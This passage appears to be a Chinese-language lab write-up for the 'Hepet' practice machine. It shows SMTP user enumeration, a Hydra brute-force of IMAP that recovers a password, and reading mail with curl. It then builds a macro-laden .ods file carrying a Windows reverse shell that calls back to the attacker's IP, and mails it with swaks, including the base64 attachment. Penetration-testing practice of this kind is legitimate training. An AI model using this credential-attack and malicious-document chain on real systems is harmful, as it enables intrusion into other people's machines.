\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Hepet]\n\u2514\u2500$ smtp-user-enum -M VRFY -U list -t 192.168.162.140\nStarting smtp-user-enum v1.2 ( http:\/\/pentestmonkey.net\/tools\/smtp-user-enum )\n\n ----------------------------------------------------------\n|                   Scan Information                       |\n ----------------------------------------------------------\n\nMode ..................... VRFY\nWorker Processes ......... 5\nUsernames file ........... list\nTarget count ............. 1\nUsername count ........... 274\nTarget TCP port .......... 25\nQuery timeout ............ 5 secs\nTarget domain ............ \n\n######## Scan started at Thu Jun 12 03:29:59 2025 #########\n192.168.162.140: Charlotte exists\n192.168.162.140: Magnus exists\n192.168.162.140: Agnes exists\n192.168.162.140: Jonas exists\n192.168.162.140: Martha exists\n######## Scan completed at Thu Jun 12 03:30:16 2025 #########\n5 results.\n\n274 queries in 17 seconds (16.1 queries \/ sec)<\/code><\/pre>\n\n\n\n
\u5206\u5225\u628a\u90a3 5 \u500b user \u5efa\u6210\u4e00\u500b list \uff0c\u7528 hydra \u7206\u7834<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Hepet]\n\u2514\u2500$ hydra -L users -P list 192.168.162.140 imap     \nHydra v9.5 (c) 2023 by van Hauser\/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2025-06-12 03:34:59\n[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 1370 login tries (l:5\/p:274), ~86 tries per task\n[DATA] attacking imap:\/\/192.168.162.140:143\/\n[143][imap] host: 192.168.162.140   login: Jonas   password: SicMundusCreatusEst\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2025-06-12 03:35:47\n                                                                                                                             \n\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Hepet]\n\u2514\u2500$ cat users \nCharlotte\nMagnus\nAgnes\nJonas\nMartha<\/code><\/pre>\n\n\n\n
\u5176\u4e2d\u7684\u7b2c\u4e8c\u5c01\u4fe1\u6709\u63d0\u5230 LibreOffice<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Hepet]\n\u2514\u2500$ curl \"imap:\/\/192.168.162.140\/INBOX;MAILINDEX=2\" --user jonas:SicMundusCreatusEst\nReceived: from spooler by localhost (Mercury\/32 v4.62); 19 Oct 2020 12:28:41 -0700\nX-Envelope-To: <jonas@localhost>\nReturn-path: <mailadmin@localhost>\nReceived: from kali (192.168.118.8) by localhost (Mercury\/32 v4.62) with ESMTP ID MG000001;\n   19 Oct 2020 12:28:40 -0700\nMessage-ID: <359094.447081105-sendEmail@kali>\nFrom: \"mailadmin@localhost\" <mailadmin@localhost>\nTo: \"agnes@localhost\" <agnes@localhost>\nCc: \"jonas@localhost\" <jonas@localhost>,\n \"magnus@localhost\" <magnus@localhost>\nSubject: Important\nDate: Mon, 19 Oct 2020 19:28:39 +0000\nX-Mailer: sendEmail-1.56\nMIME-Version: 1.0\nContent-Type: multipart\/related; boundary=\"----MIME delimiter for sendEmail-808784.915440814\"\nX-PMFLAGS: 570949760 0 5 YGWVEUL6.CNM\n\nThis is a multi-part message in MIME format. To properly display this message you need a MIME-Version 1.0 compliant Email program.\n\n------MIME delimiter for sendEmail-808784.915440814\nContent-Type: text\/plain;\n        charset=\"iso-8859-1\"\nContent-Transfer-Encoding: 7bit\n\nTeam,\n\nWe will be changing our office suite to LibreOffice. For the moment, all the spreadsheets and documents will be first procesed in the mail server directly to check the compatibility. \n\nI will forward all the documents after checking everything is working okay. \n\nSorry for the inconveniences.\n\n\n------MIME delimiter for sendEmail-808784.915440814--<\/code><\/pre>\n\n\n\n
Initial Access<\/h3>\n\n\n\n
\u751f\u4e00\u500b ods file \u585e\u5165 macro \uff0c\u518d\u5bc4\u7d66 mailadmin<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Hepet]\n\u2514\u2500$ python3 ~\/tools\/MMG-LO\/mmg-ods.py windows 192.168.45.228 4444 \n[+] Payload: windows reverse shell\n[+] Creating malicious .ods file\n\nDone.<\/code><\/pre>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Hepet]\n\u2514\u2500$ swaks -f jonas@localhost -t mailadmin@localhost -s 192.168.162.140 -h \"a\" --body \"a\" --attach @file.ods \n=== Trying 192.168.162.140:25...\n=== Connected to 192.168.162.140.\n<-  220 localhost ESMTP server ready.\n -> EHLO a\n<-  250-localhost Hello a; ESMTPs are:\n<-  250-TIME\n<-  250-SIZE 0\n<-  250 HELP\n -> MAIL FROM:<jonas@localhost>\n<-  250 Sender OK - send RCPTs.\n -> RCPT TO:<mailadmin@localhost>\n<-  250 Recipient OK - send RCPT or DATA.\n -> DATA\n<-  354 OK, send data, end with CRLF.CRLF\n -> Date: Thu, 12 Jun 2025 05:14:20 -0400\n -> To: mailadmin@localhost\n -> From: jonas@localhost\n -> Subject: test Thu, 12 Jun 2025 05:14:20 -0400\n -> Message-Id: <20250612051420.910526@kali>\n -> X-Mailer: swaks v20240103.0 jetmore.org\/john\/code\/swaks\/\n -> MIME-Version: 1.0\n -> Content-Type: multipart\/mixed; boundary=\"----=_MIME_BOUNDARY_000_910526\"\n -> \n -> ------=_MIME_BOUNDARY_000_910526\n -> Content-Type: text\/plain\n -> \n -> a\n -> ------=_MIME_BOUNDARY_000_910526\n -> Content-Type: application\/octet-stream; name=\"file.ods\"\n -> Content-Description: file.ods\n -> Content-Disposition: attachment; filename=\"file.ods\"\n -> Content-Transfer-Encoding: BASE64\n -> \n -> UEsDBBQAAAAAAGUpzFoAAAAAAAAAAAAAAAAGAAAAQmFzaWMvUEsDBBQAAAAAAGUpzFoAAAAAAAAA\n -> AAAAAAAQAAAAQ29uZmlndXJhdGlvbnMyL1BLAwQUAAAAAABlKcxaAAAAAAAAAAAAAAAACQAAAE1F\n -> VEEtSU5GL1BLAwQUAAAAAABlKcxaAAAAAAAAAAAAAAAACwAAAFRodW1ibmFpbHMvUEsDBBQAAAAI\n -> AGUpzFqT16DaOwcAAMgzAAAKAAAAc3R5bGVzLnhtbO1b627bNhT+vT2FoALDBkyWbKdp7CUOdmnX\n -> AU0wtB2G\/SpoipKJUqJA0nHSt9mz7MXGiyhLsiTLie10a5wgicjvXMjvnEOKUs4vbxPi3CDGMU0v\n -> 3OEgcB2UQhriNL5w\/3j\/yjtzL2dff3VOowhDNA0pXCYoFR4XdwRxR0qnfJogAS7cJUunFHDMpylI\n -> EJ8KOKUZSq3IdI2dajvm2ijuK527UZKPaF\/ZW068iHqQJhkQeE4qaiiVehZCZFPfV7LG0ICy2B8F\n -> wYlvri36luD0Y4FfrVaD1Vhjh5PJxNe9FhrCApctGdGoEPqIIOUa94eDoW+xelL7DkeDy0MQ6Fb0\n -> FVbYsmzIwKqvrMLK8KiKj8P+4uOwLMtv4t5Dvolb6IMLwHoPXoPL0iwTHeQ\/9xnKKBPFPIN5f5Y0\n -> uGwrXSZzxHpPFhBgg2gZq6vOYF0xLBArwWEnHAIC1+nYPxWlT6PKpHQn0cTXoIIyaXUdsSwuaktE\n -> l6kctyxIuX10myGGVRcgWmxa0VCP404vhoGvMBZP6D1cyItQSUOlIGFEbDIU1hvVUOol3MOp5Ipm\n -> 05J0WV0CxKKl0pz5V7JT\/7h6s66HLOlLocJWUhEynPVOI4OuzD5NmlyV3A99ifDQjSp5RRFdiIS0\n -> F1HVa6ExC8NGqFQ99mVBlWni3WC0elZEF+dj0STx\/q2v+jxVAYvCmzHEFSlCr4L9hl+WMZOQU11a\n -> TcfuzK6cEZWrZgQg8kIECZ+dm7Qumh1zrSxeuG+wrBFas\/MOpHLGZOWz0ASTuwv3G5BR\/kMNZxpd\n -> p6Ja4b0YpTLwZBngK8x5BZFhAWWE3QCGdXr6W1xbQhyCLW6tMX1cuuMCJQ\/x6QpDRjmNhPMXeI1w\n -> q1813N5889s4ztvNZsmOIUQRWJJ8C2U1537qCulBRIhr4RlgIGYgW3iZLBOICSz3XaZLoqUWmnkh\n -> 5gKkahslS\/JzmKwnTIX5pqB2tCXUImq6Of6k9AWZ0G0EpPESxLIJGRCUNVIw6fPLd25drSezB6RN\n -> xKxxSr\/FGSum0xqyfZ8Wtie3aDt+vt60q3YHBN3Ww7RmtUA12i16F7huuej67Vrz3kDo7Nys8PlC\n -> X2HZzPh14NZATn6V4FQvB7GUC3GMBZcuakMNOi3DmwZ+Mf647bHltwu\/RkBt\/juEnSIuixsBr2q4\n -> Lfh01BAqdz\/PAv2pR9voJI8202a2w6lcpQBZN68Qjheyts8pCVsjymgqd2o\/816rstRvtFpAs+6C\n -> \/hbtRX+7\/gKiLaxjaAulOSsfRsGHoVUrkz4j4M6rIJzh4zA3PNuBuYbpqVSDswdx16Z9nfXN+ndh\n -> L4fch79RN3+jR+JvtEf+Rgfmr1n\/Ifl7L+fzQcR0VNxrKtB+SC+EatTPAfwYM3VP49koiOQHwnUo\n -> gpimgHhz4gmmpidFG31Cdhd9SitlobqTDQYvZDl0OCU4dJ6dBeqrfQNSisSx\/rTuOPYRicGBI7FZ\n -> \/yEj8RWlIt1bxLSTk\/PYhxws72Yx3DM5VunhyGm3cP8yfydn0pz+Hb6II7RT6pR0ykKg3UQWo3O3\n -> BbLCoTqBAEtBWxBtTn25SfpOALHkh1owfqU0PPqCAaFeMPrU9SA4PW3YYTzV9a6QuUZLwUo6j7wR\n -> 6MPrZPLE6868\/gSOn6uK0Z6cQth4N\/DEaRenfwKWHuGM5Imbe3DzkjHKHmF11FT1ybhIfx7EaufJ\n -> 1wM53XLytQdGdzv5+hFCSdQjHYo8kdJFSsdppAHs6zByh0TMiTxSIn555XXNfMs5Zs78no4xd2B+\n -> h4OnJ+YfxPy4k\/nx0ZkP9af\/SN4i3v147NhLSvUk6tBHNGWn9rB4bT2oe+Di1eOYrnnx8mtP3\/NL\n -> NUsJEBh6tmPrA9tR2wPbEEEsk8iTWQARv3Bl1Ss9yu3u3flBb6YeTst0o0tRce8qS4ZuA2jzsb96\n -> L0zet3gJDaUcYZ6Yr+vlAoGwbjJviygV8lc1ztUYFnn4BIMX6q0D3QxYLHsIilR7tZHl6GrrnAqh\n -> XhwKilcX\/HaPcleO76WgWYOLVXf8DQ56cDf6H3FXfiw0GpxM1o+FSoUnA6F5vTgYBMMzK9VwTxWo\n -> r2J2SgiZVTHaiJONkX7+gfSZztf2qPZbi2nekQBeqCjefMoblaZKFtReWCnnQUOJM+5XtyAXbgQI\n -> RxKj32zO8t98gZDRMbu8vDz36415S1abmlo8KHKbzdUTMMKMb4Oayd3i\/u\/\/\/C1jBTj5tZoQsyTM\n -> htbnUtvGMIyNWqj3GEaO7B6Gv0HmNn7f5u9Pd9A76kmvaWYoxtRk3a6MmwZ\/9q35S2BBylBz\/d3G\n -> jFYsVpp0lte8CIGwM6BfTS1vIeVuwilA3g0gS\/XiUzAaecGpNzxxZ0Hg6+8gyL1QwNn3jnU42a5a\n -> gazq4ek0OJ2OTwZnp8\/zqiJNTPV3MeimXKiO77+dIJZ1vyyg3+qbTSZlAdP2+AnlN9dRv\/n\/cGb\/\n -> AlBLAwQUAAAACABlKcxatKDYjtgGAABbPwAADAAAAHNldHRpbmdzLnhtbO1b3XOjOBJ\/vvsrUn6d\n -> yhh\/JLdxTbLVYPyRjRODwUn8JkDGTABRIIydv\/4k2d5JvCabsWFq74p+QEZq\/dRqt7oblfTt91Xg\n -> ny1xnHgkvK41vkq1MxzaxPFC97pmGr3z32q\/3\/z7X9\/IfO7ZuOMQOw1wSM8TTCnjSc5Y\/zDpbJqv\n -> a2kcdghKvKQTogAnHWp3SITDXbfOW+6OGG1bQ8h1bUFp1KnXeYcNx1cSu\/WmJLXrm\/cd98r3wpc\/\n -> +bMs+5q1BG\/j6uqqLlp3rDYJ5577WcE23BvBtkK+0U2rdrPTw276N9+2XTbFuUdxwHVztq3mg13X\n -> 2Ow6Sw9nf2qtdqjf+z5TL\/EsH0OMkUGi2q6RriPW6IW0diN9q\/8V5KeA7\/CcloP86Dl0cQi62bz4\n -> z8noA+y5i4OSty8an0U\/D1B07oUOXmFnfyScHf6LRB9mLvH6M\/LibOjsCZnQmP3\/tRtuDT8nKQfd\n -> k9NATB9\/J+j7LgPyHTU+YX1KGickHpPEo8z4nwo0kvfIzwUiD0jsvZKQIn8S+R4dEQfva39B4hPM\n -> G8fUs8tC35N+p6Ail+db+UvAB5t6SyzQdRS6OeppHge+k7dgl7WD1fMcyom4xbruHapMKCVBgcAz\n -> QgKDoRRq0Rx0ivx0H1UI2pCO1QFyMXetH6JfHgk+WZCsH3v7XtsixMcorN3QOMVHLo7QZsrEjoFX\n -> 9IHlFHOfZHfYRfY6b6w58pOcwQ5Uvo1Mec0ihHx2HYvgkhO9RBQ52c3ZMfF9C8W5uUKjdXFV2fOp\n -> 9swHkFnS9DKOMU87jrC3zwwzwzER8ifFLx6Of09oWdDlrHiOqhCfxAfNpXnZYqnwZQF\/awlKGaCE\n -> SZ4GoU6yAUYO+wQqZZDJAmPKHE0J6MPkIaXsQxBP1oFF\/GSC98N7IYMIix+w5MHnCQRzjmrI\/Wau\n -> OZ2wyIbJJESRQXSUULxvVEUMsAFmc9p8aJU2go4TZly53xXMkx7p7fbhD35cnAo\/SS3HW3pJrvgF\n -> gR8W\/ljT2cDDyksma5aJxCT0XvOt9H87zdl+0x9mSDD9\/J7NpiKNEbemn9m8AZ\/Ne8ySJXpLLAWF\n -> NvZL0HUU+WszwXEXUVQCfEqJgnw79RHNdQbHwysLFCObGaVCgijGCbf5wlM2NbCwA4mHQpZtehHt\n -> scyzhGAjhuHz8PGq\/IE+xD7BOwvwO2brv0BZD6Ew3dLmUmLy9X+RHHW3+94TtgpLylb+wHEolt44\n -> DW2aogO7TcUM9EsSvV8VQEvP8u688MWMHObT87cwW0dCE+TobEUQtrhLkFzEUxzfs5ecfYmRZ8ck\n -> IXN6JnjPKDkbd3snjTZGEY57MQmYXaX7e3kFzuogPErwZVv2QhSvazd93fpSlxrRc+t2aTevAkeR\n -> NTvwU1ZK1lrWdPUZ\/klkPPrf7eDq1WrOpGFPXqPHC1bqS\/Zb1d13rI8AKtwvzN27CrCY8NJhj1FD\n -> f5hmov4PUCVAmvwdBkOwMvkV+r\/BzJUlUABMkNfQfwFr++6AvNzWq\/CxbmQZRv0WyFoPRkvQQAZ4\n -> gcBNJKWvAXsfQ89VwGX1vMxYqTJ5i1fZAVJ\/\/NT4Yyjk5Y86J8m5NV+1\/emoE\/NiOnS7Q1C07p2s\n -> 1p+e6JfPjWf+KPdhK6roH0fq37Pk0Jo\/evf3U5VskZQ2DBIYAbShqwHzURl0VVYy96BIoGvQhO6I\n -> r3sq2gFa0LXhTuP8I9Yu9zjfSNRr8ACw4u1axnFYP8Gnwpyvq95tz5T0kQHy1Ar89ezpXjXUDMx+\n -> L5s93RroKfKZj5FAvWJ+c5o6\/Z6EHq9S6Mlj09cnmumbDMNncSBxnvTIarbBDKavRksWfCNN7lrN\n -> 1dJ+aSxnfRM0xme1hnmqSFQm0\/S7rhraD32GEGXDBXe83URU8J9jIhuZK12Ezr37pT2YyHO4fx4I\n -> T2EIppF4Ku\/xu5uCOX2F\/GjPdn+f\/CgquVdjgjC\/zvy7CZYm+9Bvcz8+hcEIZhrz7z2AZ435ffbu\n -> ZMy\/szgwg9x+YxjYPB74nI\/FgQXvZ2dyi8cN25VfeFedx4k+w9NkCkxXIn6oI95+AQMRRwxe\/5zJ\n -> DY7D4o8Eg5efN7iKKqqooooqqqiiiiqqqKKKKqqooooqqqiiikoh1ZW7htTQtKk+13tTzVCnz09S\n -> Y6yrpgGq3rD7Kx+rYr\/88sGfpqh5sXSa7evqMGV1mPIt+AQtsbFIAytEXgmn+jj8dHPn9CFUfJKU\n -> YTvlnXov+ah+mafeS7\/FsA4pWk3EWRUdzw8fvTnycuzmRA8\/p2LgICrqxGbexdPN+UBFVG1Px5Zz\n -> C5U4+IPjPh9cQzrthlTuweH6X65\/1\/Muxt\/8F1BLAwQUAAAACABlKcxaH5hVdl4EAABoDwAACwAA\n -> AGNvbnRlbnQueG1srVfLbuM2FF23X2GowOwo+jEBEo3tAEVRzCIBimYKtEuapGR2SFEgKcv++15S\n -> b4\/lCJ3ZOBB57r3nPnjIbJ\/PSi5O3Fih8120ipfRgudUM5Fnu+ivL7+jx+h5\/\/NPW52mgvKEaVoq\n -> njtEde7g7wLMc5so7sguKk2eaGKFTXKiuE0cTXTB89Ym6bFJCFR\/157nWjc8Bvapnmt7thKlGqir\n -> gjhxkCM3WoOfo3NFgrG3rQPF2mR4vVx+xPV3iz5LkX\/t8FVVxdUmYFdPT0847LZQRjtcURoZUIxi\n -> LrmnZvEqXuEWa91Fzi5FAA9TcPzs5hp77NCWGVLNtfVYmI+x+YbNN9+woa09ZbNTPmUT7aNHYmYn\n -> H8BDa1O4O81\/wIYX2riuzuQwv0sBPIyVl+rAzexiEUe+aTTManV3WCsjHDcDOL0Lp0TS\/jjOP4rA\n -> aT0qyv1D9IQDqGsZRO0n1mSduKS6zCFvUKQmPj8X3Ai\/RWQwS0Yeruf4LovVEntMi5f6f1BoRGjg\n -> YSRIgsv2MHTRb7rRGimLBCip0UUysB66U8QdJ5TmEb\/CZvh5fen10Ki5LfTY0VGkRhSzj1GNHlVf\n -> q1tUofcrDAjET17yOhH14e2EwRrX2x3YsknXf7++vNEjV6QHi\/fBUHjrSN6Luo93ntc4n4xm6XXv\n -> rsp5Pjolp28Jv9tCM8PYTShw3mC4MUAH0Enw6pfu+Fi7cbcsvvyJ\/R7yEt\/dLIXh1pN34Z6f19+h\n -> TZ1WU5LBe2ET7du3QT0OtvsOzUZSWHgogMF+28zLeH3RrEqSZyXJQFfhWDS+osXIxHPdRTBjcOYI\n -> g8z8NZscDQfJOuUstmUeQ0dN3Fi9QXcZMSx+1ayUfBX\/QS6MXJ67UL9CCegHoopPUtO6NG0JWu\/u\n -> UkBMK1QBwoX3WzyVHJ6oQgoPJZQSyhHjVPoqBDXvlhf1d53bi4CrIRBZvJEcZh8uvBaqhLzsog+k\n -> 0PbTFa5ejBYj1x6PMs9OgPrbSlg7QhTCURCWEzEiqDJ+h1pJBSPv0OoxcyhdoHjqezi9Cmq01alb\n -> \/EM+czHJ6wr3w7jhqR4366R0GuRbUBT8dM0Pv6NMqF51wRrq4a6E144sVR61lsNFVIDycOMEt4tU\n -> JwfDyVd04CBC4NCHbj028Eowf5Os4\/XDI1WB\/4DONDczxc3o6ooYrAxZ1Vt+8chFdgS1WsYfH9YQ\n -> \/D7h0nKkCycUkWho7UzJ5\/N25DbvdlHBw4obVIASNNLyG09JKd1VUoOE6sccE7aQ5NLwabz5Jxc8\n -> ipHSDDxJg9zhW6p4cjCajYNml15QQYAJs0fO3X5bh\/YvnlKGk48sdz5iy6r3mYqcIUkOXMLlmhJp\n -> gWSN8YU1PAMPBsGNBvrudfwWqhKSUdBO21e93gy\/DbCu2mf9r690vRTyQX0DRmbN4N6Ahvlvqls3\n -> AVEuJRpi2u6MqfgBueHQD+1VbPDnG3JlO15pTbwTNizR4LSP2oJHjcMT\/ybv\/wNQSwMEFAAAAAgA\n -> ZSnMWtX4snEGAQAAkwMAAAwAAABtYW5pZmVzdC5yZGbNk8tugzAQRdftV1hmjQ10U1BIFkVZV+0X\n -> uGZIrIIHeUwJf18HoijKolVfUpczurpzfCSvNoeuZW\/gyKAteSoSzsBqrI3dlXzwTXzPN+vbm5Wr\n -> m+Kp2rIQt1SEqeR77\/tCynEcxXgn0O1kmue5TDKZZXFIxDRZrw6xpYiHCsbmkgpIO9P7cI8dZ\/WC\n -> gy85+akFEqF+yZ7SfuphjjkgHJyG89kaNQlUZCjGHux835LEpjEaZCoy2YFXEusmep67t6YFLhcQ\n -> eUXyKd4ZylJS7BU9KudPLsLmq1D96y7iV8+6EPBdSI3Wg\/V\/I\/FhKf\/nFi8V\/JjyV9wdKSvUQxew\n -> PkBaduGHrd8BUEsDBBQAAAAIAGUpzFqFbDmKLAAAAC4AAAAIAAAAbWltZXR5cGUFwYEJACAIBMCN\n -> bCbRh4RSSWv+7jhzmXBb+HiuFFxWFAnXkLvhTZUHrDWB\/lBLAwQUAAAACABlKcxaxCnQoKcBAABo\n -> AwAACAAAAG1ldGEueG1sjZPLkpswEEXXyVdQSrYggXiqMLPLKqmkKp5Kdi6Q2owSLLkkMUz+Pjxt\n -> T+LFsNPVPfTtbigfXk6d9wzGSq12KAwI8kBxLaRqd+hx\/8nP0UP1\/l2pj0fJgQnN+xMo55\/A1d7I\n -> KstaI0S3Q0\/OnRnGwzAEAw20aXFECMUtFrWr\/WcJwwe0EhO8Q71RTNdWWqbqE1jmONNnUFsJdvWy\n -> OddyXoK8lV5j3\/JaX7JOwOLY8sZ4OW\/ul06q3\/d6C4uiwPPtZhX84jv3pptdgmPoYMpjcRiEGHlr\n -> oJuJU1Rt0516rcq5Y26gdqPDH6cHVUSiyCepH8b7MGUkYjQJSJaQ+SnxHaIUnN1DM0bDIM+jDd1s\n -> S1UQ0o2b90Vv5ndV3\/bxl\/D7WuG\/29cQ\/8M7sFX0j3uVF28LCkZYm+qzbAx8nfvGWRAFcRB+\/CHH\n -> \/Q328DNPD2ns3VgOZ6N\/AXc4ykSWJLRI06LmNM+aJi5yoAkNaVNkpMmOUPD4WKwhrvWW+pfv17qx\n -> Besk92bd1U0HPte9cuNO0CJy6LpNI6ummynGVcVViV9tD9\/7U6q\/UEsDBBQAAAAIAGUpzFq92pps\n -> VQEAAGkFAAAVAAAATUVUQS1JTkYvbWFuaWZlc3QueG1stVRPa8MgFD9vnyJ4HdF1uwxpWthgt53W\n -> fQCrL6lgVPRZ2m8\/E5o2YxQalt18vufvn+hyfWhNsYcQtbMVWdBHUoCVTmnbVORr816+kPXq\/m7Z\n -> CqtriMiHRZEP2nguK5KC5U5EHbkVLUSOkjsPVjmZWrDIf87znupcjRQ8kxO0cXAYcEPDB6DaJasE\n -> 5ukTERw8BN21hOGurrUEPkLombKF4uKh1gbKPB+OFwV1Mqb0AncVYVeFXVIApUWJRw8VEd4bLXtF\n -> bG8V7UOgY+80+gBCxR0AEjZJy2sGk+wTRfYcFPtwKhlY0OzvihrMllnX\/hNPlEF7LM32v5gGAjk\/\n -> wZuztW5S6G8kPrEbry0m22mhSVM5RpjIPuzRoOobmPPUw3SLEY8G4vzRtYBiftQcJ3avYHbgzS61\n -> Wyu0iQyHJfW2ucKiW9EA6\/oT0wbE\/B\/enPeS\/fotV99QSwMEFAAAAAAAZSnMWgAAAAAAAAAAAAAA\n -> AA8AAABCYXNpYy9TdGFuZGFyZC9QSwMEFAAAAAgAZSnMWk5lg3HUAAAAVgEAABMAAABCYXNpYy9z\n -> Y3JpcHQtbGMueG1sZY9Bb4JAEIXP7a8Y5y6D9VKMaKLYpElTTIoHjyu76EaYNcta5N8XlFCjp8nL\n -> zLzvven8UuTwq2ypDYc48nwExamRmvchbpKP4TvOZ68v00EUL5PtegW53llh68ltalXCerP4+lwC\n -> Donik+I4y3SqPGP3RFESwU1HJj0Xih00CKLVNwL2Dp50ElvIs3eTjstO1yEenDtNiEyDMf+YN9\/3\n -> qbvB7uWSaz72D1VVedX4ejwKgoCu2xYJD8y678eiUCH+OMFSWIl3vVvfTOSlQmpD01Pq2R9QSwME\n -> FAAAAAgAZSnMWrpOnzDZAAAAYAEAABwAAABCYXNpYy9TdGFuZGFyZC9zY3JpcHQtbGIueG1sXY9P\n -> T8JAEMXP8inWudMpngyhkEgxMUFKYjl4XDtTbLLdaXYXxW\/vooUGTpM3\/37vzRbH1qgvdr4Rm8Ek\n -> SUGxrYQau89gVz6PH2ExH93N7vNiWb5vV8o0H067n2lf1Xb3tH5ZKhgjFh3boq6bihNxe8S8zNW\/\n -> zqU6tGyDigDE1QYU9PcJBYIT4PZv9GX9WWXwGUI3RZSIkAHxkKYp9jtwsWZ1yxm8BW1JOxr6jjWJ\n -> NfFbrY3nYdBp77\/FUeckcBWYzhvRmLo4Y8N\/Ga4xr0IHwxPAUwi8STH\/BVBLAwQUAAAACABlKcxa\n -> y7lLIJIDAAAeBwAAGgAAAEJhc2ljL1N0YW5kYXJkL01vZHVsZTEueG1sdZXbctpIEIav7aeY1cVW\n -> disgOUUqjjc49Y8kDokVGAO7gTshyYIAEkFSZPz02z0DcUhh34yl6cPXf3eLDx8fN2vxI9kVyzxr\n -> W1dNxxJJFuXxMkvb1mTcaVxbH28vLz784Q3c8XToiyLaLbflzSaPq3UihhN513eF1bDtwTbJBg8P\n -> yyhp5rvUtr2xJ8yzl0fVJslKQeFt2\/9iCcu4N+Mytjj6aVBCyoob865tLcpye2PbOYXPn8O\/cRzH\n -> NibWkSkLN0nbCnSQq59v12GWVmFKN6My3MmwWEbWaRXj\/ZZus3y3CdfW7b0fCPE3\/wkhMaLqzNPl\n -> 5cWomothuI\/DPf2flCIfLZL1WrSFu0vCMhnMvyVR+cr6z0Rv6lvrr8sLY9e8r7JXf36v8vKfbV6T\n -> 5Ppl8piIRr3M4rwuyj1Vv1jGcZKJhv+YRFVJbRnm62W0F3K\/DYtCNBLxCfIbujVCJdfothADKTwH\n -> fcgBuhPENUr415im8js\/T2vpwAUmtXyLXkD27OfgLj3YAxU6AeY1xy0wU2RPdnQ\/gR9gAun9li+H\n -> GyFQeAuvT3Z4hDfFgON4Cl8Un30EKVpsd6f56D3g8PlZ4R1chYi5en3Ot2CePvCeOc\/UV8GPDFdH\n -> 8+91XUqWcFMTr1NwvVSfYrs5Og6+KqzQ7SNhP7KP6qNOqOG2mPsNvAnzPvH5AKzRKxBAvodXkI4y\n -> R3eFOevFecDxVr9yPnG+KGVOH3Ouu3OsRx3sT\/IX7BfAnOS\/RG9l+mH0DthunsqM44bAFq7OV7IO\n -> M8X8oHrlO+Yj\/xXnJf8FxxvyPXGOmadHuis55Pyh5gvMnLgO\/gXrBOYcGG6u7+x8TJgnAc9PC0rJ\n -> Mc\/DSMlP8DUn9ekaM8it5quZt4X7mvMrjqf7S32s0I3O60H16PmgeQgV+Zu6ng46aHvqs57Lo+6f\n -> dT7mMn4zrp\/yTbU+fQxTbOD5vA\/XbD+u5RXf3zG\/6deRN2V9BzVxUd0zzal4jhasV1hj\/6yrnlc9\n -> jzPuG+lGe7XTPDpOxHsy1n3Vz5o3Z51pjlach\/RUh37lv\/oRrz7PcBzm+efc5jznZl5Ssxfdc32Q\n -> Mbwcg1RK3hdVc79WvCfPe+Sf9CF\/sT7S86V9pXq+Hvqr4+j+nuc\/9vmle+KqD++jgz7PfTndd5qv\n -> VBboMTfb8f6bfT3\/3Qh4f3+YvDjGbZvv8Gvh0OfZz2JBn3b6HbJPfhdu\/wdQSwMEFAAAAAAAZSnM\n -> WgAAAAAAAAAAAAAAABwAAABDb25maWd1cmF0aW9uczIvYWNjZWxlcmF0b3IvUEsDBBQAAAAAAGUp\n -> zFoAAAAAAAAAAAAAAAAYAAAAQ29uZmlndXJhdGlvbnMyL2Zsb2F0ZXIvUEsDBBQAAAAAAGUpzFoA\n -> AAAAAAAAAAAAAAAXAAAAQ29uZmlndXJhdGlvbnMyL2ltYWdlcy9QSwMEFAAAAAAAZSnMWgAAAAAA\n -> AAAAAAAAABgAAABDb25maWd1cmF0aW9uczIvbWVudWJhci9QSwMEFAAAAAAAZSnMWgAAAAAAAAAA\n -> AAAAABoAAABDb25maWd1cmF0aW9uczIvcG9wdXBtZW51L1BLAwQUAAAAAABlKcxaAAAAAAAAAAAA\n -> AAAAHAAAAENvbmZpZ3VyYXRpb25zMi9wcm9ncmVzc2Jhci9QSwMEFAAAAAAAZSnMWgAAAAAAAAAA\n -> AAAAABoAAABDb25maWd1cmF0aW9uczIvc3RhdHVzYmFyL1BLAwQUAAAAAABlKcxaAAAAAAAAAAAA\n -> AAAAGAAAAENvbmZpZ3VyYXRpb25zMi90b29sYmFyL1BLAwQUAAAAAABlKcxaAAAAAAAAAAAAAAAA\n -> GgAAAENvbmZpZ3VyYXRpb25zMi90b29scGFuZWwvUEsDBBQAAAAAAGUpzFoAAAAAAAAAAAAAAAAf\n -> AAAAQ29uZmlndXJhdGlvbnMyL2ltYWdlcy9CaXRtYXBzL1BLAwQUAAAACABlKcxapoQwVWAAAACT\n -> AAAAGAAAAFRodW1ibmFpbHMvdGh1bWJuYWlsLnBuZ+sM8HPn5ZLiYmBg4PX0cAkC0nuB+D8HM5Cc\n -> PFM9FUhxBviEuP7\/\/x8k\/v9\/3ft+fyDL1dPFMaTi1tuDjLxA3qEF3\/1z+dlFGEgCH5L3OjEwnncM\n -> LQDxPF39XNY5JTQBAFBLAQIUAxQAAAAAAGUpzFoAAAAAAAAAAAAAAAAGAAAAAAAAAAAAEAD9QQAA\n -> AABCYXNpYy9QSwECFAMUAAAAAABlKcxaAAAAAAAAAAAAAAAAEAAAAAAAAAAAABAA\/UEkAAAAQ29u\n -> ZmlndXJhdGlvbnMyL1BLAQIUAxQAAAAAAGUpzFoAAAAAAAAAAAAAAAAJAAAAAAAAAAAAEAD9QVIA\n -> AABNRVRBLUlORi9QSwECFAMUAAAAAABlKcxaAAAAAAAAAAAAAAAACwAAAAAAAAAAABAA\/UF5AAAA\n -> VGh1bWJuYWlscy9QSwECFAMUAAAACABlKcxak9eg2jsHAADIMwAACgAAAAAAAAAAAAAAtIGiAAAA\n -> 